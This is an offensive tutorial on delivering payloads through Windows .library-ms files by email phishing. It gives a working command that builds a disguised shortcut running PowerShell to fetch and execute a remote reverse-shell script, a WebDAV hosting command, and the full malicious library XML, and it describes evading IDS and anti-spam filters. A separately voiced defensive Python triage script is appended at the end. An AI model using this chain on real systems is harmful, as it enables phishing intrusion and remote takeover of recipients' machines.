Windows Library Files
Theory
Windows Library files (.library-ms files) are virtual containers for user content. They can point to a remote or local storage location.
We may send this file by e-mail and use social engineering to get the recipient to open the container (it will appear as a normal directory in Windows Explorer) and then to double-click on our hosted payload to execute it.
By delivering our payload via a Windows Library File rather than sending a direct link to the remote server hosting it, we may avoid IDS/IPS/anti-spam solutions.
Practice
In this scenario, we'll create a .library-ms file pointing to our WebDAV server, which hosts a malicious .lnk file. The user will need to open both the container and the shortcut file to execute our payload.
First, let's create our malicious .lnk shortcut using lnk.py (Python).
# -a : Arguments
# -i : Icon location
python2.7 lnk.py evil.lnk 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -a '-c "iex(iwr http://192.168.45.225/rev.ps1 -UseBasicParsing)"' -i 'C:\Windows\System32\Notepad.exe'
Then, start a WebDAV server to host our payload:
# Install with: sudo apt install python3-wsgidav
wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root .
We can now create our evil.library-ms file with the following content:
<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <name>@windows.storage.dll,-34582</name>
  <version>6</version>
  <isLibraryPinned>true</isLibraryPinned>
  <iconReference>imageres.dll,-1003</iconReference>
  <templateInfo>
    <folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
  </templateInfo>
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <isDefaultSaveLocation>true</isDefaultSaveLocation>
      <isSupported>false</isSupported>
      <simpleLocation>
        <url>http://ATTACKING_IP</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>
If you created this file on Linux, you may need to convert it to Windows line endings as follows:
unix2dos evil.library-ms
We can now send the evil.library-ms file to the target!
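A defender-side triage of the format shown above, added here as an example and not part of the original page: it parses a .library-ms document (a constructed sample modelled on evil.library-ms, keeping the page's ATTACKING_IP placeholder and the CRLF line endings unix2dos produces) and flags any connector whose simpleLocation points to a network location rather than a local path. Function names are my own.

```python
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

# Namespace declared on the root element of a .library-ms document.
NS = {"lib": "http://schemas.microsoft.com/windows/2009/library"}

# Constructed sample modelled on the page's evil.library-ms; ATTACKING_IP is
# the page's placeholder. CRLF line endings mimic the unix2dos step.
SAMPLE = """<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
<name>@windows.storage.dll,-34582</name>
<version>6</version>
<isLibraryPinned>true</isLibraryPinned>
<iconReference>imageres.dll,-1003</iconReference>
<searchConnectorDescriptionList>
<searchConnectorDescription>
<isDefaultSaveLocation>true</isDefaultSaveLocation>
<isSupported>false</isSupported>
<simpleLocation>
<url>http://ATTACKING_IP</url>
</simpleLocation>
</searchConnectorDescription>
</searchConnectorDescriptionList>
</libraryDescription>
""".replace("\n", "\r\n").encode("utf-8")


def library_locations(data: bytes) -> list[str]:
    """Return the text of every <simpleLocation><url> in the document."""
    root = ET.fromstring(data)
    return [(u.text or "").strip()
            for u in root.iterfind(".//lib:simpleLocation/lib:url", NS)]


def is_remote(location: str) -> bool:
    """True when Explorer would fetch the location over the network."""
    if location.startswith("\\\\"):            # UNC path such as \\host\share
        return True
    # A drive letter parses as a one-letter 'scheme'; only web schemes count.
    return urlparse(location).scheme.lower() in {"http", "https"}


def triage(data: bytes) -> dict:
    """Flag a library whose connectors point outside the local machine."""
    locations = library_locations(data)
    remote = [loc for loc in locations if is_remote(loc)]
    return {"locations": locations, "remote": remote, "suspicious": bool(remote)}


if __name__ == "__main__":
    print(triage(SAMPLE))
```

The same check can be run over .library-ms attachments at the mail gateway, since a library whose only connector is an HTTP or UNC location has no legitimate reason to arrive by e-mail.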